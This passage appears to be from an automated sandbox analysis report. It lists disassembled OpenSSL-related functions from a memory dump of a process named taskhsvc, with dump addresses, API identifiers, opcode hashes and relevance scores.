                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_newO_s_fileR_put_error
                                                            • String ID: $!$P$t$y
                                                            • API String ID: 3557565517-1891209401
                                                            • Opcode ID: c3255efe5d4f2e67b8146a9d14517d727f16df608faa4c2313c2ddea8e916ee5
                                                            • Instruction ID: 7481d02a2b857957ea84710da1a3cd46791d0ed3a9e58da270f31ad75192051c
                                                            • Opcode Fuzzy Hash: c3255efe5d4f2e67b8146a9d14517d727f16df608faa4c2313c2ddea8e916ee5
                                                            • Instruction Fuzzy Hash: 18E1C1B13097069FD740AF25C19476FBBF0AF84748F21991DE9988BB21E734D8859B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB0DD0 Relevance: 79.1, APIs: 43, Strings: 2, Instructions: 367COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$N1_item_freeP_get_orderR_put_errorX_endX_freeX_newX_startY_get0_groupY_get0_public_key__stack_chk_fail
                                                            • String ID: A$f
                                                            • API String ID: 2684192164-3676314414
                                                            • Opcode ID: 2bff6bdd3d412ded6e4953a1aed0b2ee7d921192b1e5eed762742f2b0e38c6c9
                                                            • Instruction ID: 679a87055ac34358657cd4f6924ed3db6298d1c1d19829a9250279bc78af310a
                                                            • Opcode Fuzzy Hash: 2bff6bdd3d412ded6e4953a1aed0b2ee7d921192b1e5eed762742f2b0e38c6c9
                                                            • Instruction Fuzzy Hash: 46F1D0B06197419FD300DF6AC68065ABBF0BF88758F218A2DF4D897B50E774D9458F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0ACB0 Relevance: 79.1, APIs: 41, Strings: 4, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $!$P$t$y
                                                            • API String ID: 0-1891209401
                                                            • Opcode ID: 17b8bff824fb42a47f94cec89ecef4d87980cf4bc2c1b8d0166e25469b0b5a8f
                                                            • Instruction ID: e047df70e0ae5a6ec6065d495dd77a7904858b9a6bc92b0c3fcbdfa641c006a5
                                                            • Opcode Fuzzy Hash: 17b8bff824fb42a47f94cec89ecef4d87980cf4bc2c1b8d0166e25469b0b5a8f
                                                            • Instruction Fuzzy Hash: 06C1C1B13097069FD700AF25C69176FBBF0AF84788F11891DE9988BB11E735D885DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE8C840 Relevance: 65.1, APIs: 36, Strings: 1, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_free$N_bin2bn$P_freeP_newR_put_errorX_new
                                                            • String ID: A
                                                            • API String ID: 1420501482-3554254475
                                                            • Opcode ID: 30867ac295464eb8fb697251ca8eea817f597eb2f20fba035083a2811976f874
                                                            • Instruction ID: e8fbc3c9a3126a4452439dc61eecd1e48d341e056d7b3847c5f5fcc6097fd2c2
                                                            • Opcode Fuzzy Hash: 30867ac295464eb8fb697251ca8eea817f597eb2f20fba035083a2811976f874
                                                            • Instruction Fuzzy Hash: 33E1E5B061A7019FE700EF69C48475ABBF0BF85748F219E2DE4D997B50E7B8D4448B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE82D30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 283COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$B_call$N_add_wordN_copyN_is_prime_fasttest_ex$N_cmpN_mulN_value_oneX_endX_start
                                                            • String ID: 2
                                                            • API String ID: 1485418919-450215437
                                                            • Opcode ID: a6753c465388280ec7f506bd018c4b633a30bee84dc0e1f31d0bd14d004d4b56
                                                            • Instruction ID: 45569e6c734ada8aaa6a67a8bb8a1ee1462cd8436f5f6e42bf7b7ed56b9cfd1d
                                                            • Opcode Fuzzy Hash: a6753c465388280ec7f506bd018c4b633a30bee84dc0e1f31d0bd14d004d4b56
                                                            • Instruction Fuzzy Hash: 5DC1ACB051A701AFD3409F2AC58825EFBF0BF98748F60891EE99897B50E778D845CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE78F90 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 326COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_cmpN_num_bitsN_value_one
                                                            • String ID: arg2 lt arg3
                                                            • API String ID: 1848942457-4160843357
                                                            • Opcode ID: 02f750f5f984967f8a7e0cff2e77c797a8b11e9b71640067a8e13442be140d71
                                                            • Instruction ID: e0ee579550d6390c9f70867dc4fb9d73a57b719909adda5ee2453f48b7b3e2e7
                                                            • Opcode Fuzzy Hash: 02f750f5f984967f8a7e0cff2e77c797a8b11e9b71640067a8e13442be140d71
                                                            • Instruction Fuzzy Hash: F6C13A70619B019BD7209F29C58435EB7F1AF85358F358D2DE899CBB80E735C846CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE746A0 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error__stack_chk_fail
                                                            • String ID: A$d$q$z$z
                                                            • API String ID: 738277180-1118053764
                                                            • Opcode ID: 71d480d2e8dade05176cddce8a68638279d6018c430cb93f8adca837a3dcf73d
                                                            • Instruction ID: 4bd600fad9390dbc9f87251968ae54200ed7f93f3b3c66a092b4eadc38bc65ff
                                                            • Opcode Fuzzy Hash: 71d480d2e8dade05176cddce8a68638279d6018c430cb93f8adca837a3dcf73d
                                                            • Instruction Fuzzy Hash: D8C126B15087019FE320DF26C58435BBBF4AF85358F21891DE9988BB50D3B9E549CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF624B0 Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OPENSSL_load_builtin_modules.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624CC
                                                              • Part of subcall function 6CF62470: ASN1_add_oid_module.LIBEAY32 ref: 6CF6247E
                                                            • ENGINE_load_builtin_engines.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624D1
                                                              • Part of subcall function 6CEBFDD0: OPENSSL_cpuid_setup.LIBEAY32 ref: 6CEBFDDE
                                                              • Part of subcall function 6CEBFDD0: ENGINE_load_rdrand.LIBEAY32 ref: 6CEBFDE3
                                                              • Part of subcall function 6CEBFDD0: ENGINE_load_dynamic.LIBEAY32 ref: 6CEBFDE8
                                                            • ERR_clear_error.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624D6
                                                              • Part of subcall function 6CEDAA60: ERR_get_state.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CE8ABD3), ref: 6CEDAA6F
                                                            • CONF_modules_load_file.LIBEAY32 ref: 6CF624EE
                                                              • Part of subcall function 6CF61B00: NCONF_new.LIBEAY32 ref: 6CF61B29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_load_builtin_enginesE_load_dynamicE_load_rdrandF_modules_load_fileF_newL_cpuid_setupL_load_builtin_modulesN1_add_oid_moduleR_clear_errorR_get_state
                                                            • String ID: b
                                                            • API String ID: 366989932-1908338681
                                                            • Opcode ID: e79533eddc3d89e9d638258aa313cbe781c8c629f43d9d8eb46fba0a6904931c
                                                            • Instruction ID: d1082cb6296ae31dba6f81958a2ee06e78e130d35425b4d2f573292eaa8cd23b
                                                            • Opcode Fuzzy Hash: e79533eddc3d89e9d638258aa313cbe781c8c629f43d9d8eb46fba0a6904931c
                                                            • Instruction Fuzzy Hash: F8D168B16093059FD700DF2AC58475BBBF1AF89348F15892DE8989BB01E736E945CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE7C400 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
